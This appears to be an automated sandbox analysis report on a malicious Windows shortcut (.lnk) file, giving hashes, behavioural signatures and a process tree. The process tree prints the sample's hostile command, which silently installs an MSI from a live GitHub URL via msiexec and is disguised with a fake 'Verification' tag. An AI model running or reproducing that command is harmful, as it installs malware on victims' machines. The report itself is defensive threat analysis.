Analysis
-
max time kernel
11s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
19/02/2025, 03:26
Static task
static1
Behavioral task
behavioral1
Sample
420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f.lnk
Resource
win7-20241010-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f.lnk
Resource
win10v2004-20250217-en
21 signatures
150 seconds
General
-
Target
420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f.lnk
-
Size
1KB
-
MD5
63b4ae48bfc52db08f3ad1008acff185
-
SHA1
a2affc5d7b5211f97142c0def7ad9c430119e0b2
-
SHA256
420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f
-
SHA512
0c9fafdc316375aa4fd046a3ce485346c179d85092971707b1c61e57022a15e350a06f7f27faa3c9c110540f4161ed20b274f35b5cd4579df8d98f8387e85b4b
Score
7/10
Malware Config
Signatures
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 2368 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2940 msiexec.exe 6 2940 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2368 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 2368 msiexec.exe Token: SeIncreaseQuotaPrivilege 2368 msiexec.exe Token: SeRestorePrivilege 2940 msiexec.exe Token: SeTakeOwnershipPrivilege 2940 msiexec.exe Token: SeSecurityPrivilege 2940 msiexec.exe Token: SeCreateTokenPrivilege 2368 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2368 msiexec.exe Token: SeLockMemoryPrivilege 2368 msiexec.exe Token: SeIncreaseQuotaPrivilege 2368 msiexec.exe Token: SeMachineAccountPrivilege 2368 msiexec.exe Token: SeTcbPrivilege 2368 msiexec.exe Token: SeSecurityPrivilege 2368 msiexec.exe Token: SeTakeOwnershipPrivilege 2368 msiexec.exe Token: SeLoadDriverPrivilege 2368 msiexec.exe Token: SeSystemProfilePrivilege 2368 msiexec.exe Token: SeSystemtimePrivilege 2368 msiexec.exe Token: SeProfSingleProcessPrivilege 2368 msiexec.exe Token: SeIncBasePriorityPrivilege 2368 msiexec.exe Token: SeCreatePagefilePrivilege 2368 msiexec.exe Token: SeCreatePermanentPrivilege 2368 msiexec.exe Token: SeBackupPrivilege 2368 msiexec.exe Token: SeRestorePrivilege 2368 msiexec.exe Token: SeShutdownPrivilege 2368 msiexec.exe Token: SeDebugPrivilege 2368 msiexec.exe Token: SeAuditPrivilege 2368 msiexec.exe Token: SeSystemEnvironmentPrivilege 2368 msiexec.exe Token: SeChangeNotifyPrivilege 2368 msiexec.exe Token: SeRemoteShutdownPrivilege 2368 msiexec.exe Token: SeUndockPrivilege 2368 msiexec.exe Token: SeSyncAgentPrivilege 2368 msiexec.exe Token: SeEnableDelegationPrivilege 2368 msiexec.exe Token: SeManageVolumePrivilege 2368 msiexec.exe Token: SeImpersonatePrivilege 2368 msiexec.exe Token: SeCreateGlobalPrivilege 2368 msiexec.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2148 wrote to memory of 2824 2148 cmd.exe 30 PID 2148 wrote to memory of 2824 2148 cmd.exe 30 PID 2148 wrote to memory of 2824 2148 cmd.exe 30 PID 2824 wrote to memory of 2368 2824 cmd.exe 31 PID 2824 wrote to memory of 2368 2824 cmd.exe 31 PID 2824 wrote to memory of 2368 2824 cmd.exe 31 PID 2824 wrote to memory of 2368 2824 cmd.exe 31 PID 2824 wrote to memory of 2368 2824 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c #Verification660703 & msiexec /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn2⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\system32\msiexec.exemsiexec /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn3⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2940